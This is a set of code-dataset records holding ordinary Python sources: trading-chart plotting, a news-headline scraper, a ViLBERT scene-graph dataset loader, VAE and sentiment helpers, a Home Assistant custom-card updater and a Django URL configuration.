color='r')\r\n #Exit Short\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == -2.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == -2.0],\r\n 'v', markersize = 10.0, color='r')\r\n #Stay Same\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == 0.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == 0.0],\r\n 'o', markersize = 10.0, color='m')\r\n \r\n plt.xlim(start_win,end_win)\r\n \r\n ax1.grid()\r\n \r\n### AX 2: Derivatives\r\n ax2 = fig.add_subplot(312)\r\n \r\n ax2.plot(self.df.loc[:, \"first_diff\"], color = 'b', linestyle='--')\r\n ax2.plot(self.df.loc[:, \"second_diff\"], color = 'g', linestyle='--')\r\n\r\n# ax2.plot(self.df.loc[:, \"third_diff\"], color = 'y', linestyle='--')\r\n# ax2.plot(self.df.loc[:, \"fd_high\"], color = 'b', linestyle=':')\r\n# ax2.plot(self.df.loc[:, \"fd_low\"], color = 'b', linestyle=':')\r\n# ax2.plot(self.df.loc[:, \"sd_high\"], color = 'g', linestyle=':')\r\n# ax2.plot(self.df.loc[:, \"sd_low\"], color = 'g', linestyle=':')\r\n \r\n plt.xlim(start_win,end_win) \r\n ax2.grid()\r\n \r\n### AX 3: Stochastic\r\n ax3 = fig.add_subplot(313)\r\n ax3.plot(self.df.loc[:, \"stoch_k\"])\r\n ax3.plot(self.df.loc[:, \"stoch_d\"])\r\n ax3.plot(self.df.loc[:, \"stoch_l\"])\r\n ax3.grid()\r\n \r\n #Plot it:\r\n fig.tight_layout()\r\n plt.xlim(start_win,end_win)\r\n plt.show()\r\n \r\n return int(portfolio['total'].tail(1)), self.df.loc[:, 'close'].std()", "sub_path": "mint_cash.py", "file_name": "mint_cash.py", "file_ext": "py", "file_size_in_byte": 13157, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.to_datetime", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.option_context", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}]} +{"seq_id": "394627934", "text": "#!/usr/bin/env python 3\n# -*- coding: utf-8 -*-\n\"\"\"\nbrief\nAuthors: zuyunbo\nDate: 2021/07/21 16:24:00\n\"\"\"\nimport json\nimport requests\nimport time\nimport sys\nimport hashlib\nfrom lxml import etree\nfrom datetime import datetime\n\n\nfrom data_writer.data_writer import ToutiaoDataWriter\n\n\nclass SpiderV5(object):\n \"\"\"\n spider\n \"\"\"\n\n def __init__(self, baseurl):\n self.baseurl = baseurl\n self.data_list = []\n self.session = requests.session()\n self.headers = {\n \"Connection\": \"close\",\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 \\\n (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\n }\n time_now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n dt = time.strptime(time_now, \"%Y-%m-%d %H:%M:%S\")\n self.insert_time_stamp = int(time.mktime(dt))\n self.insert_time = time_now\n\n def start_spider(self):\n \"\"\"\n 开始spider\n \"\"\"\n res = self.session.get(url=self.baseurl, headers=self.headers)\n html = etree.HTML(res.content)\n trs_list = html.xpath('//*[@id=\"listhot2\"]/li/a')\n result = []\n for _, tr in enumerate(trs_list):\n tr_title = tr.xpath(\".//text()\")[0].strip()\n tr_url = tr.xpath(\".//@href\")[0].strip()\n\n data = {\"content\": '',\n 'title': tr_title,\n 'url': \"https://tophub.today\" + tr_url,\n 'create_time_stamp': 0,\n 'hot_tag': '',\n 'site_name': '',\n 'cnt': 0\n }\n result.append(data)\n for _, item in enumerate(result):\n # 生成ids\n m = hashlib.md5(item[\"title\"].encode(encoding='utf-8'))\n item_id = m.hexdigest()\n item[\"news_daily_no\"] = item_id\n return result\n\n def start(self):\n print('执行澎湃爬虫')\n baseurl = 'https://www.thepaper.cn'\n select_bre = SpiderV5(baseurl=baseurl)\n datalist = select_bre.start_spider()\n ToutiaoDataWriter().do_write(datalist)\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n baseurl = sys.argv[1]\n else:\n baseurl = 'https://www.thepaper.cn'\n select_bre = SpiderV5(baseurl=baseurl)\n datalist = select_bre.start_spider()\n ToutiaoDataWriter().do_write(datalist)\n", "sub_path": "spider_pengpai_v1.py", "file_name": "spider_pengpai_v1.py", "file_ext": "py", "file_size_in_byte": 2419, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.session", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "time.strptime", "line_number": 35, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 44, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 44, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 62, "usage_type": "call"}, {"api_name": "data_writer.data_writer.ToutiaoDataWriter", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "data_writer.data_writer.ToutiaoDataWriter", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "234865807", "text": "import json\nfrom typing import Any, Dict, List\nimport random\nimport os\n\nimport torch\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport _pickle as cPickle\nimport json_lines\n\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom ._image_features_reader import ImageFeaturesH5Reader\nimport pdb\nimport csv\nimport sys\n\ndef assert_eq(real, expected):\n assert real == expected, \"%s (true) vs %s (expected)\" % (real, expected)\n\ndef _converId(img_id):\n\n img_id = img_id.split('-')\n if 'train' in img_id[0]:\n new_id = int(img_id[1])\n elif 'val' in img_id[0]:\n new_id = int(img_id[1]) + 1000000 \n elif 'test' in img_id[0]:\n new_id = int(img_id[1]) + 2000000 \n else:\n pdb.set_trace()\n\n return new_id\n\n\ndef _load_annotationsVGSG_R(annotations_jsonpath, split):\n entries = []\n with open(annotations_jsonpath, 'r') as f:\n scene_graphs = json.load(f)\n if split=='train':\n scene_graphs = scene_graphs[:int(0.9*len(scene_graphs))]\n elif split=='val':\n scene_graphs = scene_graphs[int(0.9*len(scene_graphs)):]\n for scene_graph in scene_graphs:\n if split == 'test':\n pass\n else:\n objects = scene_graph['objects']\n if len(objects)==0:\n continue\n objects2name = {x['object_id']:(x['names'][0], x['synsets'][0] if len(x['synsets'])>0 else -1) for x in objects}\n object_list = list(objects2name.values())\n relationships = scene_graph['relationships']\n relation_tuples = [(objects2name[x[\"subject_id\"]], (x['predicate'], x['synsets'][0] if len(x['synsets'])>0 else -1), objects2name[x[\"object_id\"]]) for x in relationships]\n num_obj = len(objects)\n num_rel = len(relation_tuples)\n # filter out phrase relation\n filtered_relation_tuples = [] \n for rel in relation_tuples:\n if len(rel[1][0].split())==1 and len(rel[0][0].split())==1 and len(rel[2][0].split())==1:\n filtered_relation_tuples.append(rel)\n entries.append(\n {\"image_id\":scene_graph['image_id'], 'relations': filtered_relation_tuples, 'objects': object_list}\n )\n\n return entries\n\nclass VGSGDataset(Dataset):\n def __init__(\n self,\n task: str,\n dataroot: str,\n annotations_jsonpath: str,\n split: str,\n image_features_reader: ImageFeaturesH5Reader,\n gt_image_features_reader: ImageFeaturesH5Reader,\n tokenizer: BertTokenizer,\n padding_index: int = 0,\n max_seq_length: int = 40,\n max_region_num: int = 60\n ):\n # All the keys in `self._entries` would be present in `self._image_features_reader`\n if task == 'VGenomeSceneGraph':\n self._entries = _load_annotationsVGSG_R(annotations_jsonpath, split)\n else:\n assert False\n self._split = split\n self._image_features_reader = image_features_reader\n self._gt_image_features_reader = gt_image_features_reader\n self._tokenizer = tokenizer\n\n self._padding_index = padding_index\n self._max_seq_length = max_seq_length\n self._max_region_num = max_region_num\n self.num_labels = 1\n\n self._names = []\n if not os.path.exists(os.path.join(dataroot, \"cache\")):\n os.makedirs(os.path.join(dataroot, \"cache\"))\n\n # cache file path data/cache/train_ques\n cache_path = \"data/VGSG/cache/\" + split + '_' + task + \"_\" + str(max_seq_length) + \"_\" + str(max_region_num) + \"_vcr.pkl\"\n if not os.path.exists(cache_path):\n self.tokenize()\n self.tensorize()\n cPickle.dump(self._entries, open(cache_path, 'wb'))\n else:\n self._entries = cPickle.load(open(cache_path, \"rb\"))\n\n def tokenize(self):\n \"\"\"Tokenizes the captions.\n\n This will add caption_tokens in each entry of the dataset.\n -1 represents nil, and should be treated as padding_idx in embedding.\n \"\"\"\n count = 0\n for entry in self._entries:\n token_pairs = []\n for relation in entry['relations']:\n assert len(relation) == 3\n token_pairs.append((relation[0][0],relation[1][0],relation[2][0]))\n\n num_rels = len(entry['relations'])\n num_random_rels = (self._max_seq_length - 2) // 3 - num_rels\n\n if num_random_rels>0:\n pass\n # gt_pairs = {(rel[0],rel[2]) for rel in entry['relations']}\n # random_pairs = self._get_random_pair(entry['objects'], gt_pairs, num_random_rels)\n # for pair in list(random_pairs):\n # token_pairs.append((pair[0][0],'background', pair[1][0]))\n else:\n for i in range(-num_random_rels):\n token_pairs.pop()\n\n random.shuffle(token_pairs)\n tokens = []\n for pair in token_pairs:\n tokens.extend(pair)\n\n tokens = ['[CLS]'] + tokens + ['[SEP]']\n tokens_char = tokens\n\n target = [self._tokenizer.vocab.get(self._tokenizer.tokenize(x)[0], self._tokenizer.vocab['[UNK]']) if i%3==2 else -1 for i, x in enumerate(tokens)]\n tokens = [self._tokenizer.vocab.get(self._tokenizer.tokenize(x)[0], self._tokenizer.vocab['[UNK]']) if i%3!=2 else self._tokenizer.vocab.get('[MASK]', self._tokenizer.vocab['[UNK]']) for i, x in enumerate(tokens)]\n \n for i in range(len(tokens)):\n if target[i] != -1:\n print(tokens_char[i],tokens[i],target[i])\n\n segment_ids = [0] * len(tokens)\n input_mask = [1] * len(tokens)\n # input_mask = [1 if i%3==2 else 0 for i in range(len(tokens))]\n # co_attention_mask = [-1 if i%3==2 else 1 for i in range(len(tokens))]\n # co_attention_mask = torch.zeros((self._max_region_num, self._max_seq_length))\n # co_attention_mask[0] = -1\n # co_attention_mask[-1] = -1\n \n if len(tokens) < self._max_seq_length:\n padding = [self._padding_index] * (self._max_seq_length - len(tokens))\n tokens = tokens + padding\n input_mask += padding\n segment_ids += padding \n target += [-1] * len(padding) \n\n assert_eq(len(tokens), self._max_seq_length)\n entry['input_ids'] = tokens \n entry[\"input_mask\"] = input_mask\n entry['segment_ids'] = segment_ids\n # entry[\"co_attention_mask\"] = co_attention_mask\n entry['target'] = target\n\n sys.stdout.write('%d/%d\\r' % (count, len(self._entries)))\n sys.stdout.flush()\n count += 1\n\n def tensorize(self):\n\n for entry in self._entries:\n input_ids = torch.from_numpy(np.array(entry[\"input_ids\"]))\n entry[\"input_ids\"] = input_ids\n\n input_mask = torch.from_numpy(np.array(entry[\"input_mask\"]))\n entry[\"input_mask\"] = input_mask\n\n segment_ids = torch.from_numpy(np.array(entry[\"segment_ids\"]))\n entry[\"segment_ids\"] = segment_ids\n\n target = torch.from_numpy(np.array(entry[\"target\"]))\n entry[\"target\"] = target\n\n def _get_random_pair(self, object_list, gt_pairs, num_pairs):\n num_obj = len(object_list)\n candidate_pair_set = set()\n for i in range(num_obj):\n for j in range(i,num_obj):\n candidate_pair_set.add((object_list[i], object_list[j]))\n candidate_pair_set.add((object_list[j], object_list[i]))\n candidate_pair_set = candidate_pair_set - gt_pairs\n return random.choices(list(candidate_pair_set),k=min(num_pairs, len(candidate_pair_set)))\n\n def __getitem__(self, index):\n \n entry = self._entries[index]\n\n image_id = entry[\"image_id\"]\n features, num_boxes, boxes, _ = self._image_features_reader[image_id]\n\n boxes = boxes[:num_boxes]\n features = features[:num_boxes]\n\n gt_features, gt_num_boxes, gt_boxes, _ = self._gt_image_features_reader[image_id]\n\n # merge two features.\n features[0] = (features[0] * num_boxes + gt_features[0] * gt_num_boxes) / (num_boxes + gt_num_boxes)\n\n # merge two boxes, and assign the labels. \n gt_boxes = gt_boxes[1:gt_num_boxes]\n gt_features = gt_features[1:gt_num_boxes]\n gt_num_boxes = gt_num_boxes - 1\n\n gt_box_preserve = min(self._max_region_num-1, gt_num_boxes)\n gt_boxes = gt_boxes[:gt_box_preserve]\n gt_features = gt_features[:gt_box_preserve]\n gt_num_boxes = gt_box_preserve\n \n num_box_preserve = min(self._max_region_num - int(gt_num_boxes), int(num_boxes))\n boxes = boxes[:num_box_preserve]\n features = features[:num_box_preserve]\n\n # concatenate the boxes\n mix_boxes = np.concatenate((boxes, gt_boxes), axis=0)\n mix_features = np.concatenate((features, gt_features), axis=0)\n mix_num_boxes = num_box_preserve + int(gt_num_boxes)\n \n image_mask = [1] * (mix_num_boxes)\n while len(image_mask) < self._max_region_num:\n image_mask.append(0)\n\n mix_boxes_pad = np.zeros((self._max_region_num, 5))\n mix_features_pad = np.zeros((self._max_region_num, 2048))\n\n mix_boxes_pad[:mix_num_boxes] = mix_boxes[:mix_num_boxes]\n mix_features_pad[:mix_num_boxes] = mix_features[:mix_num_boxes]\n\n # appending the target feature.\n features = torch.tensor(mix_features_pad).float()\n image_mask = torch.tensor(image_mask).long()\n spatials = torch.tensor(mix_boxes_pad).float()\n\n input_ids = entry[\"input_ids\"]\n input_mask = entry[\"input_mask\"]\n segment_ids = entry[\"segment_ids\"]\n target = entry[\"target\"]\n\n assert_eq(len(input_ids),len(input_mask))\n assert_eq(len(input_mask),len(segment_ids))\n assert_eq(len(segment_ids),len(target))\n\n if self._split == 'test':\n # anno_id = entry[\"anno_id\"]\n anno_id = 0#entry[\"anno_id\"]\n else:\n anno_id = entry[\"image_id\"]\n\n co_attention_mask = torch.zeros((1, self._max_region_num, self._max_seq_length))\n input_ids = input_ids.unsqueeze(1)\n input_mask = input_mask.unsqueeze(1)\n segment_ids = segment_ids.unsqueeze(1)\n return features, spatials, image_mask, input_ids, target, input_mask, segment_ids, co_attention_mask, anno_id\n\n def __len__(self):\n return len(self._entries)\n\n def get_tokenizer(self):\n return self._tokenizer\n", "sub_path": "vilbert/datasets/vgsg_dataset.py", "file_name": "vgsg_dataset.py", "file_ext": "py", "file_size_in_byte": 10829, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pdb.set_trace", "line_number": 31, "usage_type": "call"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 68, "usage_type": "name"}, {"api_name": "_image_features_reader.ImageFeaturesH5Reader", "line_number": 75, "usage_type": "name"}, {"api_name": "_image_features_reader.ImageFeaturesH5Reader", "line_number": 76, "usage_type": "name"}, {"api_name": "pytorch_pretrained_bert.tokenization.BertTokenizer", "line_number": 77, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "_pickle.dump", "line_number": 106, "usage_type": "call"}, {"api_name": "_pickle.load", "line_number": 108, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 136, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 173, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 174, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 174, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 189, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 266, "usage_type": "call"}]} +{"seq_id": "408783726", "text": "import torch\nimport numpy as np\nfrom torch.autograd import Variable\nfrom collections import defaultdict, Counter, OrderedDict\nclass OrderedCounter(Counter, OrderedDict):\n 'Counter that remembers the order elements are first encountered'\n\n def __repr__(self):\n return '%s(%r)' % (self.__class__.__name__, OrderedDict(self))\n\n def __reduce__(self):\n return self.__class__, (OrderedDict(self),)\n\ndef to_var(x, cuda2, volatile=False):\n if torch.cuda.is_available():\n x = x.to(cuda2)\n return Variable(x, volatile=volatile)\n\n\ndef idx2word(idx, i2w, pad_idx):\n\n sent_str = [str()]*len(idx)\n\n for i, sent in enumerate(idx):\n\n for word_id in sent:\n\n if word_id == pad_idx:\n break\n sent_str[i] += i2w[str(word_id.item())] + \" \"\n\n sent_str[i] = sent_str[i].strip()\n\n\n return sent_str\n\n\ndef interpolate(start, end, steps):\n\n interpolation = np.zeros((start.shape[0], steps + 2))\n\n for dim, (s,e) in enumerate(zip(start,end)):\n interpolation[dim] = np.linspace(s,e,steps+2)\n\n return interpolation.T\n\n\ndef decoding_ouput(out, idx2word):\n\n\n out = out.detach().cpu().numpy()\n sentence_list = []\n for sent_idx in range(out.shape[0]):\n sentence = \"\"\n predict = out[sent_idx, :, :]\n keys = np.argmax(predict, axis=1)\n for key in keys:\n sentence += idx2word[str(key)] + \" \"\n sentence_list.append(sentence)\n\n return sentence_list\n\ndef expierment_name(args, ts):\n\n exp_name = str()\n exp_name += \"BS=%i_\"%args.batch_size\n exp_name += \"LR={}_\".format(args.learning_rate)\n exp_name += \"EB=%i_\"%args.embedding_size\n exp_name += \"%s_\"%args.rnn_type.upper()\n exp_name += \"HS=%i_\"%args.hidden_size\n exp_name += \"L=%i_\"%args.num_layers\n exp_name += \"BI=%i_\"%args.bidirectional\n exp_name += \"LS=%i_\"%args.latent_size\n exp_name += \"WD={}_\".format(args.word_dropout)\n exp_name += \"ANN=%s_\"%args.anneal_function.upper()\n exp_name += \"K={}_\".format(args.k)\n exp_name += \"X0=%i_\"%args.x0\n exp_name += \"TS=%s\"%ts\n\n return exp_name\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\ndef sentiment_analyzer_scores(sentence):\n analyser = SentimentIntensityAnalyzer()\n score = analyser.polarity_scores(sentence)\n return score['neg'], score['neu'], score['pos'], score['compound']\n\ndef sentiment_labeler(data):\n labels = np.zeros(4)\n labels = np.reshape(labels,(1,4))\n for idx, s in enumerate(data):\n print(idx)\n\n l = np.asarray(sentiment_analyzer_scores(s))\n l = np.reshape(l, (1, 4))\n\n labels = np.vstack((labels, l))\n\n labels = np.delete(labels, 0, 0)\n return labels\n\n\n", "sub_path": "multiple_attribute/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2716, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 5, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 5, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 56, "usage_type": "call"}, {"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "1937398", "text": "\"\"\"Logic to handle custom_cards.\"\"\"\nimport logging\nimport os\nimport requests\nfrom requests import RequestException\nfrom pyupdate.ha_custom import common\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef get_info_all_cards(custom_repos=None):\n \"\"\"Return all remote info if any.\"\"\"\n remote_info = {}\n for url in common.get_repo_data('card', custom_repos):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n for name, card in response.json().items():\n try:\n card = [\n name,\n card['version'],\n card['remote_location'],\n card['visit_repo'],\n card['changelog']\n ]\n remote_info[name] = card\n except KeyError:\n print('Could not get remote info for ' + name)\n except RequestException:\n print('Could not get remote info for ' + url)\n LOGGER.debug('get_info_all_cards: %s', remote_info)\n return remote_info\n\n\ndef get_lovelace_gen(base_dir):\n \"\"\"Get lovelace-gen true if in use.\"\"\"\n return_value = False\n conf_file = base_dir + '/ui-lovelace.yaml'\n lovelace_dir = base_dir + '/lovelace'\n if os.path.isfile(conf_file) and os.path.isdir(lovelace_dir):\n with open(conf_file, 'r') as local:\n for line in local.readlines():\n if 'generated by lovelace-gen.py' in line:\n return_value = True\n return return_value\n\n\ndef get_sensor_data(base_dir, show_installable=False, custom_repos=None):\n \"\"\"Get sensor data.\"\"\"\n cards = get_info_all_cards(custom_repos)\n cahce_data = {}\n cahce_data['domain'] = 'custom_cards'\n cahce_data['has_update'] = []\n count_updateable = 0\n if cards:\n for name, card in cards.items():\n remote_version = card[1]\n local_version = get_local_version(base_dir, name)\n has_update = (remote_version and\n remote_version != local_version)\n not_local = (remote_version and not local_version)\n if (not not_local and\n remote_version) or (show_installable and remote_version):\n if has_update and not not_local:\n count_updateable = count_updateable + 1\n cahce_data['has_update'].append(name)\n cahce_data[name] = {\n \"local\": local_version,\n \"remote\": remote_version,\n \"has_update\": has_update,\n \"not_local\": not_local,\n \"repo\": card[3],\n \"change_log\": card[4],\n }\n LOGGER.debug('get_sensor_data: [%s, %s]', cahce_data, count_updateable)\n return [cahce_data, count_updateable]\n\n\ndef update_all(base_dir, show_installable=False, custom_repos=None):\n \"\"\"Update all cards.\"\"\"\n updates = get_sensor_data(base_dir, show_installable,\n custom_repos)[0]['has_update']\n if updates is not None:\n LOGGER.info('update_all: \"%s\"', updates)\n for name in updates:\n upgrade_single(base_dir, name, custom_repos)\n else:\n LOGGER.debug('update_all: No updates avaiable.')\n\n\ndef upgrade_single(base_dir, name, custom_repos=None):\n \"\"\"Update one card.\"\"\"\n LOGGER.debug('upgrade_single started: \"%s\"', name)\n remote_info = get_info_all_cards(custom_repos)[name]\n remote_file = remote_info[2]\n local_file = get_card_dir(base_dir, name) + name + '.js'\n common.download_file(local_file, remote_file)\n upgrade_lib(base_dir, name, custom_repos)\n update_resource_version(base_dir, name, custom_repos)\n LOGGER.info('upgrade_single finished: \"%s\"', name)\n\n\ndef upgrade_lib(base_dir, name, custom_repos=None):\n \"\"\"Update one card-lib.\"\"\"\n remote_info = get_info_all_cards(custom_repos)[name]\n remote_file = remote_info[2][:-3] + '.lib.js'\n local_file = get_card_dir(base_dir, name) + name + '.lib.js'\n common.download_file(local_file, remote_file)\n\n\ndef install(base_dir, name, custom_repos=None):\n \"\"\"Install single card.\"\"\"\n if name in get_sensor_data(base_dir, True, custom_repos)[0]:\n upgrade_single(base_dir, name, custom_repos)\n\n\ndef update_resource_version(base_dir, name, custom_repos=None):\n \"\"\"Update the ui-lovelace file.\"\"\"\n local_version = get_local_version(base_dir, name)\n remote_version = get_info_all_cards(custom_repos)[name][1]\n conf_file = get_conf_file_path(base_dir)\n common.replace_all(conf_file,\n name + '.js?v=' + str(local_version),\n name + '.js?v=' + str(remote_version))\n\n\ndef get_card_dir(base_dir, name):\n \"\"\"Get card dir.\"\"\"\n conf_file = get_conf_file_path(base_dir)\n with open(conf_file, 'r') as local:\n for line in local.readlines():\n if get_lovelace_gen(base_dir):\n if name + '.js' in line:\n card = line.split('!resource ')[1].split(name + '.js')\n card_dir = base_dir + '/lovelace/' + card[0]\n break\n else:\n card_dir = base_dir + '/lovelace/'\n else:\n if '/' + name + '.js' in line:\n card = line.split(': ')[1].split(name + '.js')\n card_dir = base_dir + card[0].replace(\"local\", \"www\")\n break\n else:\n card_dir = base_dir + '/www/'\n return card_dir\n\n\ndef get_conf_file_path(base_dir):\n \"\"\"Get conf file.\"\"\"\n if get_lovelace_gen(base_dir):\n return_value = os.path.join(base_dir, 'lovelace', 'main.yaml')\n else:\n return_value = os.path.join(base_dir, 'ui-lovelace.yaml')\n return return_value\n\n\ndef get_local_version(base_dir, name):\n \"\"\"Return the local version if any.\"\"\"\n return_value = None\n card_config = ''\n conf_file = get_conf_file_path(base_dir)\n if os.path.isfile(conf_file):\n with open(conf_file, 'r') as local:\n for line in local.readlines():\n if '/' + name + '.js' in line:\n card_config = line\n break\n local.close()\n if '=' in card_config:\n local_version = card_config.split('=')[1].split('\\n')[0]\n return_value = local_version\n return return_value\n", "sub_path": "pyupdate/ha_custom/custom_cards.py", "file_name": "custom_cards.py", "file_ext": "py", "file_size_in_byte": 6493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common.get_repo_data", "line_number": 14, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.RequestException", "line_number": 30, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common.download_file", "line_number": 98, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 98, "usage_type": "name"}, {"api_name": "pyupdate.ha_custom.common.download_file", "line_number": 109, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 109, "usage_type": "name"}, {"api_name": "pyupdate.ha_custom.common.replace_all", "line_number": 123, "usage_type": "call"}, {"api_name": "pyupdate.ha_custom.common", "line_number": 123, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}]} +{"seq_id": "74530971", "text": "from django.conf.urls import url\n\nfrom . import views\n\n# GET / => (redirect: project_list)\n# GET /projects => project_list\n# POST /projects => create_project => (redirect: project_detail)\n# GET /projects/WELC => project_deail\n#\n# GET /WELC-1 => api_follow_ticket => 303 See Other\n# POST / => api_create_ticket => 201 Created\n\nurlpatterns = [\n url(r'^projects/$', views.project_list, name='project_list'),\n url(r'^projects/(?P[A-Z]+)/$', views.project_detail, name='project_detail'),\n url(r'^(?P[A-Z]+-[0-9]+)/$', views.api_follow_ticket, name='api_follow_ticket'),\n url(r'^$', views.api_create_ticket, name='api_create_ticket'),\n]", "sub_path": "urid/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 